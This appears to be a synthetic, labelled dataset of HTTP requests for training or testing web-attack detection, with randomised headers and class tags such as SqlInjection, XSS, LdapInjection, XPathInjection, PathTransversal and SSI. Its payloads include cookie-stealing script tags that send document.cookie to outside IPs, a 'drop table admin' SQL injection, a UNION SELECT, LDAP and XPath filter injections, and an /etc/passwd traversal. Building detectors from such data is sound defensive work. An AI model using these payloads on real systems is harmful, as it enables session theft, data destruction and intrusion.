From: ieogO97c@1xtO.uk
If-Modified-Since: Thu, 02 Apr 09 04:44:39 GMT
If-Unmodified-Since: Fri, 30 May 08 11:46:47 CET
If-Match: "BR4X2qulDEphY.q"
If-None-Match: "@EliaMfR4Js8iSZ"
If-Range: *
Max-Forwards: 8993
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: Basic OVk0bnRzd2U6ZXdoc3Vz
Range: 686-87074
Referer: /mip9lasw/asoree/lityoeE/odhoc.txt
TE: trailers,trailers,deflate;q=0.7
Trailer: User-Agent
User-Agent: tfiwfu/4.7.3.4.2
UA-CPU: 68000
UA-Disp: 052,8339,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7374x0863
Via: 2.8 165.220.150.159, 4.4 www.nnkm1.jpeg
Transfer-Encoding: rargre
Upgrade: vet/2.3
Warning: 155 www.moac.shtml "35ronmeh9nhdee" 
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35252
Start - Id: 49897
class: XPathInjection
GET /7INVc0mx8@08Jis3X4/sb9idRda3I_0fromiz/ouvio_c9CSKlT7/aai/e.0mA74l7U0Zc5d0wz/aeejnlfst/ltGrekoova3tOhiln/8raLv.png?hixtuntnitnE=nsp&aLo70GhX_=576651&Hinytqe1=99039++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++347%3D HTTP/1.0
Host: www.as6nxejw9.st
Connection: close
Accept: */*
Accept-Charset: shift_jis, x-mac-cyrillic;q=0.6, iso-8859-7, iso-8859-3;q=0.7, x-mac-hebrew
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 30.98.150.84
Cookie: 2e=rigooklE;hpHcioe4t=jrcGo_;aexno3u2is=uns4bno;lp=6811;twsif=N
Cookie2: $Version="3"
Date: Tue, 19 Dec 06 15:12:35 GMT
ETag: W/"b-3HRHuMckDu@e-89"
Expect: 100-continue
From: t9xyb@dtrmz.gov
If-Modified-Since: Fri, 11 Jul 08 13:21:51 CET
If-Unmodified-Since: Thu, 28 Jan 10 09:29:12 GMT
If-Match: *
If-None-Match: "Qh.rIkOM9jWL_2anXt3"
If-Range: "ji5vS.tKTo0@idHN"
Max-Forwards: 9479
MIME-Version: 6.4
Pragma: neetrl='alonm'
Proxy-Authorization: Lrtb snSAa=ootE
Authorization: Digest uri=http://www.ntiinn.org/tnetie/eaeohpz/hhnr/am4nta/Boar.ace
Range: 794-
Referer: http://ehsec.org/lpl0d/jtelLEad.wmn
TE: trailers,trailers
Trailer: User-Agent
User-Agent: cCumFecr_c http://www.tvtma.ch
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9591x1965
Via: 5.9 11.61.213.70:45602, 9.7 www.hdrMwlui.gif, 7.9 220.129.159.234
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49897
Start - Id: 48929
class: XPathInjection
GET /bG@kz_ASzA1fdUY1DKvj/Lg6d94CcztmailUK/hD6xqvwH9M.5x8_Z/gs6sSnrvpESl@uAuTE/wIal5FuWSDecU/duyLzONTUQkANfZst/rrt4htl/dt3ton.jsp?nfimtsp=ux4ea2&0sshetyxtydPnfe=08635&2A3Z_=0145372817&ia=e6fROn7o%27+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28i+++%2Bj+%2B++k%2Bl%2B++1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27ezk%27%3D++%27++hFiob%27++or&lizf=dehomeotTiR8gne&2bLencleeis=pnvito7cta2T8&zdkob=o+e26q+%3CAT&ju93mgshi1VlED=re7fSJ HTTP/1.1
Host: 75.144.184.124
Connection: pe2U
Accept: image/*;q=0.9, application/zip, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: T-enuzs;q=0.0
Cache-Control: only-if-cached
Client-ip: 174.124.242.131
Cookie: cattmphtaccesCpsM=l0tl;1L8j=0295453;orericaRfi=knfEiaoieep;AEmetavs=eorps8p
Cookie2: $Version="7"
Date: Wed, 17 Feb 10 13:23:42 UTC
ETag: "10JPxibSyM8@OLZ6-kC"
Expect: 100-continue
From: lsc81e@NyZx1plgr7.de
If-Modified-Since: Tue, 29 Jun 04 18:00:09 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: "bUpuCTRfb8rz9Twk"
If-None-Match: *
If-Range: Wed, 24 May 06 02:18:18 UTC
Max-Forwards: 2483
MIME-Version: 7.0
Pragma: zdrXrci='sas6'
Proxy-Authorization: Digest cnonce="dsde"
Authorization: Digest algorithm=MD5-sess
Range: 1264-
Referer: http://2tyM.gov/ipaiyktf/rvmih4.js
TE: gzip,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 2.8; br-n1; rv:6.1.1) Gecko/13889993
UA-CPU: StrongARM
UA-Disp: 6851,715,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: FTP/7.9 www.dteer.css
Transfer-Encoding: dedro
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 4208976972
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48929
Start - Id: 48131
class: XSS
GET /ros2rsDo9WV@81b/rra6pnaiXeeoOaae/cte5ocntbtanefcO/u1/veeLrhi7h/ebrd.UFcdqV5oaw.png?mhnowhth=5302421&qe=41741060&sndeazo1eno=hxphp&aoeuuLlrwmkFjhI=%3C%21--+--+--%3E%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F110.223.154.198%2Fdend.php%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E%3C%21--+--+--%3E HTTP/1.0
Host: 10.163.199.41
Connection: close
Accept: */*
Accept-Charset: koi8, iso-8859-7;q=0.2, iso-8859-4;q=0.3, cp-936, iso-8859-3;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: mlafur-neduwyez, oe9e-rgdd7oe, yu1alsr-lHeig, esoh-ayptd1nB
Cache-Control: min-fresh=38
Client-ip: 94.244.224.171
Cookie: phmeshbesrgaa=0awde/;eep=dtadbe5vel;atesd=ct
Cookie2: $Version="2"
Date: Tue, 06 Apr 10 03:52:27 UTC
ETag: W/"RdKDdWmzVeSfgJG3"
Expect: hdZrwa
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 08 Aug 04 07:26:33 UTC
If-Unmodified-Since: Fri, 20 Aug 04 08:50:13 UTC
If-Match: "HIB@QVD@vjUmjMu@d6oK"
If-None-Match: *
If-Range: Mon, 03 Dec 07 20:32:24 UTC
Max-Forwards: 1
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: fNss o6se=C22aan
Range: 2-92,159872-,109519-
Referer: /sett/lsvs.cfm
TE: deflate,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.4 (compatible; Konqueror/5.8; Win98; jenurt; foihhng7w)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/8.7 www.5ueaa.jpeg, HTTP/4.5 227.81.84.77
Transfer-Encoding: y0sEs
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48131
Start - Id: 42080
class: SqlInjection
GET /fKjKpsB3/h30x.tiff?er2o6wA9bxaC=s4VuZTgBYdV&Vtiso2aoisp=3822791&Lac4assytfuevia=5469502&neohttoznnft4=dyx&pzenhlo2ete=5ni-&e1itm1=ssjldi&lisxvFiiacO9n=%27htoE0mN&ilnjiesn5=%3BhDc&fLn=9&eg1fagmEn=%27+++OR++%27oh4tbtxoeea%27+%3D++%27++&n3kW3dLXRKZ=dusuhyfn8erhDte HTTP/1.0
Host: www.djdtdl.de
Connection: close
Accept: application/*
Accept-Charset: x-mac-greek;q=0.9, windows-1254;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: got=aero
Client-ip: 234.253.45.250
Cookie: zn=sK7;piHEh0=tahr;ihotalolr5w8mHl=rAwmepeao5lI;hLt=U);izeval7c <t<i
Cookie2: $Version="7"
Date: Fri, 30 May 08 16:01:43 CET
ETag: "SQ-tIM.HVaLNvisl3sL"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Sat, 31 Mar 07 20:51:50 GMT
If-Unmodified-Since: Tue, 10 Aug 04 18:14:03 GMT
If-Match: *
If-None-Match: "09z3NyWNnJAYmcIw"
If-Range: "j5NgLq@Hkg6pmA8URlL"
Max-Forwards: 7199
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: tczen owIa=t6tjeTgW
Authorization: NTLM bG9jb3NhcElwZWFzeGNvNXRpcmZuaWh0U2phYXJyNmE=
Range: -951
Referer: /qieht/aeNembx/seeCo/nuNjs6.php3
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 9.9; ce-en; rv:9.2.5) Gecko/01029508
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 861x9768
Via: HTTP/8.0 179.46.94.57
Transfer-Encoding: deflate
Upgrade: uose/3.2, vzaeDe/0.5, 0rrE/2.7, gnnk/0.3, seow/3.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42080
Start - Id: 37369
class: LdapInjection
GET /YGgroup byVupdate8tfcBx/cia0iws/g-LRaCXoEtrF7/tive6bcxalaao/2AV@PWkqN@ChUZpc/anhdoi1.jpg?avraldseAdtu=aeabTytgwkr&t1QXW.vw6=e9nClo1uba&omeiiCtehUd=ddriccec&gsnetziin=4+o&intfiyzgwFah=0830&ittnmlfrpeotd=7k9I8xNh5_&qoze=87&eis2r=6559&pNiKphZR3Ne=3867449&ssg=qtss&siH51Lrh-3lg=iEjarYmivlk HTTP/1.1
Host: www.leuro.it:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: hz-gb-2312;q=0.2, iso-8859-2;q=0.2, gb2312
Accept-Encoding: )   (  |  (displayName=had*)  (name = had*)(  mail=had*   )
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 186.113.192.51
Cookie2: $Version="00"
Date: Fri, 16 May 08 01:43:13 GMT
Expect: 100-continue
From: zqant@0ialie4.be
If-Modified-Since: Sun, 07 Mar 10 10:44:10 UTC
If-Match: "YofyW7y08ncjcEr"
If-None-Match: *
If-Range: Wed, 17 Mar 04 19:09:46 CET
Max-Forwards: 494
Pragma: masEl1='It'
Authorization: hraS ngbt2c=janhhh
Referer: http://www.sc2w.uk/r1ze.jsp
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.2 (Windows; U; WinNT 0.3; aa-ke; rv:1.2.3) Gecko/43921915
Via: 8.2 www.ezbwivt.htm:8, 3.4 www.revni.shtml
Transfer-Encoding: compress
X-Forwarded-For: 170.106.4.226
----: ---------------

null

End - Id: 37369
Start - Id: 46796
class: XSS
PUT /K_iciArpswpssystemq3/los4a9e/nnnnsuaphdeefEeEchoj/ysdltRem/bd/nacmabuehuea.nsf? HTTP/1.1
Content-Length: 153
Content-Language: H1ld5,m,xasthHj
Content-Encoding: identity
Content-Location: http://bveaunta.com/o96e/Tsel49o/9uleqsAe.aspx
Content-MD5: ZXplbHRyc2xpaXRld3p0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Mar 08 17:51:20 UTC
Last-Modified: Thu, 03 Jan 08 08:46:28 CET
Host: www.emil4s8eo.biz:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: identity, identity
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 48.205.211.117
Cookie: lywtVen=8
Cookie2: $Version="17"
Date: Thu, 19 May 05 01:39:47 GMT
ETag: W/"w6tFK0pcm3oEf.Rt"
Expect: Ksasyns
From: t6qI@adwi.net
If-Modified-Since: Fri, 28 Oct 05 12:35:51 CET
If-Unmodified-Since: Tue, 14 Nov 06 16:51:08 GMT
If-Match: *
If-None-Match: *
If-Range: "icS7uH.4ofWdvcIWE"
Max-Forwards: 19
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: NTLM ZGVnN2FhYWR1eGxhZWRlZWJvYVRhc29uZW90YWllazNyMA==
Range: 15-86
Referer: /srben.php
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: oeitao/8.5.5.4.9
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: Hosrl/1.4 www.n0mepn.htm, FTP/4.1 www.te9iuor.tiff:8386
Transfer-Encoding: nBooad; 5mBetre=oph03ye
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a1ooea=i&n1Si=m+d<Tm(Y&kMOv=<<script >[window.open('http://167.146.243.95/el.sh'+document.cookie);]</script   >

End - Id: 46796
Start - Id: 38569
class: LdapInjection
GET /euwicl2vnenbdtduh3eu/2@FnHuo8Wq9/ttkzZFrOR/oIsnUiNYRX5nsuc0u/feJMk/Dy.sh?utvpnewSsef1e=i5CzZfS_21q&riuL=%5DaNewtnjt5oh3&rrhIeii2u=2242%29%28%26%28objectClass%3D2td%29%28%7C%28sn+%3D++oee%29%28cn%3DHae+++++J*%29%29&AL_FL8nwH=Asc%25ecita&eMpk1c0tenturG=7elynieaeidt1eIo&aei8dkgsemchex=7103624 HTTP/1.1
Host: 222.128.94.245
Connection: xyinrue
Accept: text/*, image/*, image/png
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.0, deflate;q=0.8, gzip, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 231.216.109.79
Cookie: HmettO=675
Cookie2: $Version="55"
Date: Thu, 07 Jan 10 18:03:11 GMT
ETag: "Xn6bLNl6HcqYn2A"
Expect: 100-continue
From: rdtaepw@enuD8ssxt.biz
If-Modified-Since: Thu, 08 Sep 05 08:25:03 GMT
If-Unmodified-Since: Sat, 01 Dec 07 01:13:46 CET
If-Match: *
If-None-Match: *
If-Range: "i77PH7Bjn25NOQMj"
Max-Forwards: 64
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: neBe nkeaN=ztiB
Range: -5
Referer: /be7l5/isli/tet2MEr4/abje.doc
TE: trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/8.0 (Windows; U; Win 9x 8.7; sa-0e; rv:2.0.9) Gecko/73079300
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6483x132
Via: FTP/8.9 117.115.247.103, HTTP/6.4 147.250.225.235
Transfer-Encoding: compress
Upgrade: lur6/3.4, nvm8re/2.6, Eprm6t/6.4, uoTtdn/4.6, loebeG/0.7
Warning: 605 www.aElte.jpg "smttlahhNbrou8r" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38569
Start - Id: 41778
class: SqlInjection
GET /metcNrexecmTnMXn/6dHNE8g3D.bodyBWE/3.BgBmMu/zuswyeie/MeY5Nnph-KAh/sVSIA.jsy/ickurrdhlzi/5lmeeiH/rencOrNcdtac/y9a8jn/2evhaRtaehlainR6i.jpg?e5uhl=214&0fyr5eds8iolfty=02236&Ig=lNscriptv&ca=nimg+&nro4yNfoyle=4QQcoHCZog7&6hen6setuersRn=%27%3B+++++drop++++table+++admin&vgs=7&ccmduZD8like=+aihome&toibsiondnybTge=5312077288&o9kJuouRalsm=%26B5nyee4ilTyob%5Ci HTTP/1.1
Host: 82.140.149.9:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=2
Client-ip: 19.38.3.115
Cookie: XNwgetXDT=veir;opTHtCewhn=655926;moiDeRr7rncas6=04109
Cookie2: $Version="725"
Date: Thu, 29 Jun 06 19:04:26 UTC
ETag: "Gebh.SWy_wN2YNY0Lxx"
Expect: oT8d=iIlx;zinlIOcf
From: rhuEDm@qpruheT.de
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Tue, 09 Jan 07 19:43:26 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0076
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: xioe0i emhA=efh6etg
Range: 4745-5836
Referer: http://www.aursene.uk/niaan0A/gs7un/Mohyet.mpeg
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.2 (Windows; U; WinNT 7.8; ub-he; rv:7.0.8) Gecko/96479848
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5624x146
Via: HTTP/5.4 www.eXara.jpg, suc/1.2 www.ehed3r.js:55
Transfer-Encoding: deflate
Upgrade: ped/5.7, utiwa/4.3, NDinca/1.6, HleG/8.5, 6ot/6.6
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41778
Start - Id: 46369
class: PathTransversal
GET /yu.IzyLnL__49Kb9/mdzmuFD/l1s2/tYOfUCLCF/tlnrRc/ieia5emrnqNt3s/nUjq036j/l5_aBxeJ9/ewwkaf6ilnsLeboso2yi.htm?WRwZMen=hvr9gP&errturn9r=i%24r%40r&g8hdtlg4wohc=%2Fetc%2Fpasswd&hvitsirdl=3exp_a&hfaoyt9oer=afrXEN.hQDc&yEnfadsyt2jN=asleu1hLincludeze&icleE=720&dR9horxa2n=imgei&ndMayoeee=eneIMRbZ6i&tna2twtg=07663&Ltnnoite99=aFGR6 HTTP/1.0
Host: www.tmnEW.fr
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: macintosh, cp-936;q=0.7, x-mac-arabic;q=0.4, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=9443
Client-ip: 214.183.248.166
Cookie: tmvE0=l1he;n9ht7Tsy2=299657;orlfjnrs=e1ihhomehvqSn/ andyro;n4rtudjLcw=)gapa
Cookie2: $Version="402"
Date: Wed, 03 Nov 04 02:23:22 CET
ETag: W/"jgwdRdcly_6yEEbe9Sv@"
Expect: f4eai5=rspwo;urlr=7czuo
From: cewts@1fgr.fr
If-Modified-Since: Thu, 19 Jun 08 14:25:17 GMT
If-Unmodified-Since: Wed, 20 Aug 08 14:09:37 CET
If-Match: *
If-None-Match: "pcMMfBcBpW4B.Uakz"
If-Range: Tue, 03 Nov 09 05:14:07 CET
Max-Forwards: 98
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: NTLM dUg5aXJFbW9odmxvZTJzeWV0ZTdhdGFkcjVhZGhzdHBFenl0bA==
Range: 2-1818,846125-
Referer: /hautl6P/ox3rw/iram/bsrs.gz
TE: trailers,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 0.5; so-el; rv:3.6.7) Gecko/48656274
UA-CPU: StrongARM
UA-Color: color8
UA-Pixels: 3216x516
Via: 7.7 www.dmpei.js:368, FTP/4.7 183.94.249.12:979
Transfer-Encoding: stg2; llfa=ecsm
Upgrade: ls17ea/6.1, if8/2.6, eEewts/0.2, pvyt/8.4
Warning: 019 www.7IncbS.jpeg "Lwzurocdatoo" "Fri, 17 Apr 09 01:12:13 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46369
Start - Id: 48425
class: XPathInjection
GET /0l7in/Jlaowjifleeeh8mGoen/rbq3l/aL/jEteSie/yiyi/elrrsr9fseapsa/Tekiaeann/2lZi9ecne/sGza-EH0jPQStZ73v0/yYU5T_S-/s4EPVc0m8pZnZt_.nsf?A5tZ0d-UWzVbw=Ip%2Bo%251himg+%7E%3Dtnull%29ehhe%26e&ensoceseraf=hgbIkTaaLs2y&Ueogo=tIan-B HTTP/1.0
Host: 41.96.249.126
Connection: close
Accept: */*
Accept-Charset: windows-1258;q=0.4, shift_jis;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: min-fresh=897
Client-ip: 118.241.235.123
Cookie: rPOhlnewrx=a;uotRheahntrd=dd/ngn/ttrhti/child::node()[  position()=4]   |   yaho6a/ouasea/Vfac/child::text()[position()=43]     or    'tsepnt'    =    '
Cookie2: $Version="50"
Date: Mon, 02 Jan 06 08:57:27 CET
ETag: W/"MZ.Sx2ldffMvzMM"
If-Modified-Since: Sun, 25 Jan 04 11:55:51 GMT
If-Unmodified-Since: Wed, 05 Apr 06 16:06:09 UTC
If-Match: *
If-None-Match: "ploQN8wZhkg.XtK"
If-Range: Sat, 26 Dec 09 18:37:17 UTC
Max-Forwards: 14
MIME-Version: 7.3
Pragma: pleorbe1=gl
Authorization: mee9 enyi=ssdhd
Range: 32-,764603-,-5924
Referer: http://www.enlfro.com/trezNa/dgp2itm/onsxMlh.doc
TE: trailers,deflate;q=0.9,gzip;q=0.4
Trailer: Host
User-Agent: ePPUkKX http://www.lslo.ch
UA-Color: color32
UA-Pixels: 3994x194
Via: imw8/6.2 www.esomQpa.tiff, cao/4.9 www.Hirsraje.jpg:3969
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 2509612458
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48425
Start - Id: 39150
class: SSI
GET /tb/eicsoanmoecetiaecpaR/Z8fX1HHlhXW/uDwSUvjN_/dtwPjjIEt9/tmpa2omAV/ot8ocd/en/3IctnbwPBeelp3/1KGoD1.php4?sfromn-tmp.rN=nEb7tattdinld&HseKlddupdate.M=09&ehooatnhe1rf=iyhoeoc&td=990933903&ecazdimars=haeeyaprtoa&ee6ftcnaEht=80814011&ciu0hmdhsdeTn3d=n-W&zhc=tfmoAnh&irTw9oQNd=5544866 HTTP/1.1
Host: 144.85.58.56:80
Connection: close
Accept: video/*, audio/*;q=0.3
Accept-Charset: x-mac-korean;q=0.4, x-mac-icelandic, koi8;q=0.2, x-mac-arabic;q=0.2, iso-8859-3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=8167
Client-ip: 1.215.232.149
Cookie: ritc=iekaoihaAesic;vxatdacatai6sr=<!--#echo var="date_gmt"-->
Cookie2: $Version="7"
Date: Sun, 06 Feb 05 16:01:05 UTC
ETag: W/"z9NkZHna8t5IFpHB5qQe"
Expect: 5rrdSb
If-Modified-Since: Fri, 09 Sep 05 08:50:45 UTC
If-Unmodified-Since: Sun, 26 Jun 05 05:59:30 CET
If-Match: "-MRe.PgdcPg6yM-15"
If-None-Match: *
If-Range: "eeugd6Yb6zJ01eue4AC"
Max-Forwards: 972
Pragma: n6='Bae'
Proxy-Authorization: 0vsnrs eehysnd=1fiFjer
Authorization: Digest qop=auth
Range: 223672-,810-
Referer: http://dpdnr.de/aeez3ci/eApeo/cVefy.fgf
TE: trailers,trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/9.5 (compatible; uh8fne; Windows NT; k8lt; aitse)
UA-CPU: x86
UA-Disp: 016,7068,8
UA-OS: Solaris
UA-Pixels: 308x434
Via: 8.0 www.zsSqO.gif:582
Transfer-Encoding: compress
Upgrade: eeey/9.3
Warning: 430 218.56.203.53 "ebsaieatngcc1Ede" 
X-Forwarded-For: 83.220.235.130
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39150
Start - Id: 37720
class: LdapInjection
PUT /3wp-svKt2v/Socrab49o7To/soitvcn/sPvqRmDv5/CU7K.between/ecBkAgUD8XmndgMq/.SxwIe2ju-x2T/WWuNOUnfp%u@_/TioeeArprwrnteosTahm.exe? HTTP/1.1
Content-Length: 84
Content-Language: eitpG6gi,q
Content-Encoding: gzip
Content-Location: http://www.oeus6aha.de/etdcS/mTsespse/tshe0.jsp
Content-MD5: c3h1akN1SEF0ZXluVHVxeA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Apr 05 18:20:26 GMT
Last-Modified: Sat, 05 Jul 08 23:01:52 CET
Host: www.his4i.net
Connection: close
Accept: text/*, video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 221.29.121.34
Cookie: CN_iU0q.4=4;kiCca=694926;0dstylelM=erf:7;d3ew4td=iefw1troarmazr1fhs;ujdtlo7lpDtoGa=eni61e85ifmhyoo
Cookie2: $Version="457"
Date: Thu, 07 Aug 08 13:31:05 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: le0heT
From: ehsEPtLe@nenolcsxew.it
If-Modified-Since: Sun, 13 Aug 06 12:44:51 GMT
If-Unmodified-Since: Sun, 03 Feb 08 04:57:47 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 09:40:41 CET
Max-Forwards: 6
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Hwhen ljaca=irec
Referer: /tzo9esaq/amcOn0/onx1or/iurfJrro/bl4YU.js
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/4.7 (compatible; eevmRN4av; WinNT; ee3s; auOckpbEac; eaapa)
UA-CPU: MIPS
UA-Disp: 919,571,16
UA-Color: color16
UA-Pixels: 8766x859
Via: 5.8 199.32.173.153, 4.6 20.155.73.37, 8.1 6.250.208.168
Transfer-Encoding: identity
Upgrade: oOfa/5.4, fNwtol/6.6
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 846902452623
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

e01GNhavingallJfromIZ=-ei&nuadowso=")(targetfilter=(o=NetscapeRoot))

End - Id: 37720
Start - Id: 42559
class: SqlInjection
GET /i_OxVLmoF8dkuD.cfm?il=%27+%29+++++UNION+ALL+++SELECT++4614+++FROM+JalBid+++++WHERE+++++%28+%27%27%3D++++%27 HTTP/1.1
Host: 81.100.122.78
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-korean;q=0.3, x-mac-icelandic;q=0.3, hz-gb-2312, x-mac-hebrew;q=0.7, euc-tw
Accept-Encoding: *
Accept-Language: aais-redrb;q=0.2, Sioet-tdee;q=0.9, i1-aasun3
Cache-Control: max-age=2
Client-ip: 29.213.12.81
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="98"
Date: Tue, 25 Dec 07 21:45:06 CET
ETag: "TraGuu_QjplOnZR"
Expect: 100-continue
From: spods@kyeiscew.net
If-Modified-Since: Thu, 16 Apr 09 09:42:07 UTC
If-Unmodified-Since: Wed, 04 May 05 15:23:36 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 8765
MIME-Version: 8.8
Pragma: ii='6EaE'
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM cTdoZHphYWxldEhpZW5pNmVUYWczYTJlbmd3ZmVhaXk1bjh1
Range: -9299
Referer: http://tgdoeh.st/t6iemC/aeeya88/Ceral.js
TE: gzip
Trailer: Expect
User-Agent: Mozilla/4.8 (X11; U; SunOS sun4u 4.8; ec-tn; rv:8.9.7) Gecko/06653562
UA-CPU: MIPS
UA-Disp: 1891,2562,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: 3.3 62.32.90.167, 3.2 252.83.1.73
Transfer-Encoding: deflate
Upgrade: idlsll/7.2
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
